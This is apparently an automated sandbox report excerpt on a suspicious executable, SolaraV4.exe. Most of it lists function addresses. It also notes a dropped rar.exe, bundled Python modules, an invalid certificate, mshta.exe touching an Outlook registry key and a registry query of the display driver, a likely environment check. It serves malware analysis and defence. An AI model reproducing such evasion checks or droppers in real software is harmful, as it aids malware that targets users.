Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC76418 3_2_00007FF6FFC76418
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC708C8 3_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61B50 3_2_00007FF6FFC61B50
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6DA5C 3_2_00007FF6FFC6DA5C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC589E0 3_2_00007FF6FFC589E0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC639A4 3_2_00007FF6FFC639A4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61944 3_2_00007FF6FFC61944
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC62164 3_2_00007FF6FFC62164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C818D0 3_2_00007FFE75C818D0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C812F0 3_2_00007FFE75C812F0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DAB360 3_2_00007FFE75DAB360
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1C94 3_2_00007FFE75DA1C94
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA17BD 3_2_00007FFE75DA17BD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA13F2 3_2_00007FFE75DA13F2
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DB1200 3_2_00007FFE75DB1200
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1398 3_2_00007FFE75DA1398
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA115E 3_2_00007FFE75DA115E
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1A87 3_2_00007FFE75DA1A87
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1997 3_2_00007FFE75DA1997
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1956 3_2_00007FFE75DA1956
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DAF8E5 3_2_00007FFE75DAF8E5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1451 3_2_00007FFE75DA1451
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA114F 3_2_00007FFE75DA114F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E07860 3_2_00007FFE75E07860
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1BDB 3_2_00007FFE75DA1BDB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E00050 3_2_00007FFE75E00050
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA20AE 3_2_00007FFE75DA20AE
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA256D 3_2_00007FFE75DA256D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 3_2_00007FFE75E502A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA168B 3_2_00007FFE75DA168B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA15B4 3_2_00007FFE75DA15B4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA6B90 3_2_00007FFE75DA6B90
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1537 3_2_00007FFE75DA1537
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE761B1850 3_2_00007FFE761B1850
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E654C5 3_2_00007FFE75E654C5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6542A 3_2_00007FFE75E6542A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E8B4C0 3_2_00007FFE75E8B4C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E615C8 3_2_00007FFE75E615C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6655F 3_2_00007FFE75E6655F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F97800 3_2_00007FFE75F97800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65F0B 3_2_00007FFE75E65F0B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65D85 3_2_00007FFE75E65D85
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7F200 3_2_00007FFE75E7F200
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E668C5 3_2_00007FFE75E668C5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6114F 3_2_00007FFE75E6114F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E66EEC 3_2_00007FFE75E66EEC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61EA1 3_2_00007FFE75E61EA1
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7F060 3_2_00007FFE75E7F060
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65164 3_2_00007FFE75E65164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E653A3 3_2_00007FFE75E653A3
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6144C 3_2_00007FFE75E6144C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6659B 3_2_00007FFE75E6659B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E629CD 3_2_00007FFE75E629CD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE760171D0 3_2_00007FFE760171D0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F8FE60 3_2_00007FFE75F8FE60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62289 3_2_00007FFE75E62289
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62D0B 3_2_00007FFE75E62D0B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7BD60 3_2_00007FFE75E7BD60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6266C 3_2_00007FFE75E6266C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6724D 3_2_00007FFE75E6724D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7BF20 3_2_00007FFE75E7BF20
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64160 3_2_00007FFE75E64160
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75ECFA00 3_2_00007FFE75ECFA00
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F9FB40 3_2_00007FFE75F9FB40
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E650A6 3_2_00007FFE75E650A6
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E8B850 3_2_00007FFE75E8B850
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E621B7 3_2_00007FFE75E621B7
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6609B 3_2_00007FFE75E6609B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6216C 3_2_00007FFE75E6216C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64F39 3_2_00007FFE75E64F39
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE76017980 3_2_00007FFE76017980
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75FFFA10 3_2_00007FFE75FFFA10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61A4B 3_2_00007FFE75E61A4B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F92670 3_2_00007FFE75F92670
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6655A 3_2_00007FFE75E6655A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64679 3_2_00007FFE75E64679
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E66FF5 3_2_00007FFE75E66FF5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65E20 3_2_00007FFE75E65E20
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE76016290 3_2_00007FFE76016290
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61B31 3_2_00007FFE75E61B31
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61424 3_2_00007FFE75E61424
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61622 3_2_00007FFE75E61622
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E63693 3_2_00007FFE75E63693
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64C32 3_2_00007FFE75E64C32
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F42E70 3_2_00007FFE75F42E70
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64CFF 3_2_00007FFE75E64CFF
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E1884 108_2_00007FF7C71E1884
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EB540 108_2_00007FF7C71EB540
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F54C0 108_2_00007FF7C71F54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E82F0 108_2_00007FF7C71E82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F1180 108_2_00007FF7C71F1180
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720AE10 108_2_00007FF7C720AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7217B24 108_2_00007FF7C7217B24
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EABA0 108_2_00007FF7C71EABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F0A2C 108_2_00007FF7C71F0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E8884 108_2_00007FF7C71E8884
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F2890 108_2_00007FF7C71F2890
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72318A8 108_2_00007FF7C72318A8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722190C 108_2_00007FF7C722190C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210904 108_2_00007FF7C7210904
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72138E8 108_2_00007FF7C72138E8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F17C8 108_2_00007FF7C71F17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72067E0 108_2_00007FF7C72067E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7237660 108_2_00007FF7C7237660
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F86C4 108_2_00007FF7C71F86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72486D4 108_2_00007FF7C72486D4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721A710 108_2_00007FF7C721A710
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7220710 108_2_00007FF7C7220710
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7222700 108_2_00007FF7C7222700
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720F5B0 108_2_00007FF7C720F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8598 108_2_00007FF7C71F8598
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721F59C 108_2_00007FF7C721F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723260C 108_2_00007FF7C723260C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72165FC 108_2_00007FF7C72165FC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225468 108_2_00007FF7C7225468
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720D458 108_2_00007FF7C720D458
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EA504 108_2_00007FF7C71EA504
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723832C 108_2_00007FF7C723832C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F2360 108_2_00007FF7C71F2360
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210374 108_2_00007FF7C7210374
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720C3E0 108_2_00007FF7C720C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7207244 108_2_00007FF7C7207244
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EF24C 108_2_00007FF7C71EF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C 108_2_00007FF7C71FE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7232268 108_2_00007FF7C7232268
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FD2C0 108_2_00007FF7C71FD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72202A4 108_2_00007FF7C72202A4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7231314 108_2_00007FF7C7231314
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E42E0 108_2_00007FF7C71E42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7222164 108_2_00007FF7C7222164
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72441CC 108_2_00007FF7C72441CC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72281CC 108_2_00007FF7C72281CC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7218040 108_2_00007FF7C7218040
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F3030 108_2_00007FF7C71F3030
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210074 108_2_00007FF7C7210074
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720C05C 108_2_00007FF7C720C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7200104 108_2_00007FF7C7200104
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72400F0 108_2_00007FF7C72400F0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7215F4C 108_2_00007FF7C7215F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724AF90 108_2_00007FF7C724AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721C00C 108_2_00007FF7C721C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7224FE8 108_2_00007FF7C7224FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724DFD8 108_2_00007FF7C724DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722AE50 108_2_00007FF7C722AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71ECE84 108_2_00007FF7C71ECE84
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723FE74 108_2_00007FF7C723FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8E68 108_2_00007FF7C71F8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722EEA4 108_2_00007FF7C722EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721AF0C 108_2_00007FF7C721AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E9EFC 108_2_00007FF7C71E9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210D20 108_2_00007FF7C7210D20
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7229D74 108_2_00007FF7C7229D74
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7231DCC 108_2_00007FF7C7231DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F1E04 108_2_00007FF7C71F1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EEE08 108_2_00007FF7C71EEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8C30 108_2_00007FF7C71F8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225C8C 108_2_00007FF7C7225C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EDD04 108_2_00007FF7C71EDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7209D0C 108_2_00007FF7C7209D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7236D0C 108_2_00007FF7C7236D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7224B38 108_2_00007FF7C7224B38
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7239B98 108_2_00007FF7C7239B98
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721FA6C 108_2_00007FF7C721FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225A70 108_2_00007FF7C7225A70
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724AAC0 108_2_00007FF7C724AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71ECB14 108_2_00007FF7C71ECB14
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721D91C 108_2_00007FF7C721D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720D97C 108_2_00007FF7C720D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E49B8 108_2_00007FF7C71E49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72269FD 108_2_00007FF7C72269FD
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: String function: 00007FF7C71F8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: String function: 00007FF7C72249F4 appears 53 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E0D3CF appears 216 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E62A04 appears 120 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E61EF1 appears 614 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FF6FFC52710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E64052 appears 305 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E0D465 appears 103 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E64836 appears 51 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FF6FFC52910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75DA12EE appears 573 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E62734 appears 209 times
Source: SolaraV4.exe Static PE information: invalid certificate
Source: rar.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SolaraV4.exe Binary or memory string: OriginalFilename vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000002.2996027741.00007FF6FFC94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegprslt.exej% vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV4.exe
Source: SolaraV4.exe Binary or memory string: OriginalFilename vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990251691.00007FFE90B7D000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990731203.00007FFE94ACC000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990992127.00007FFE957E7000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000000.2472454481.00007FF6FFC94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegprslt.exej% vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989641836.00007FFE904FB000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2986752957.00007FFE761B3000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989939238.00007FFE905B3000.00000004.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2981323193.00007FFE75D97000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2983884533.00007FFE75E51000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990498901.00007FFE94458000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988956021.00007FFE8FF74000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988233337.00007FFE7865A000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2987777433.00007FFE7663C000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2991317394.00007FFE99DBC000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988613549.00007FFE8F41D000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989294446.00007FFE8FF98000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV4.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: Commandline size = 3647
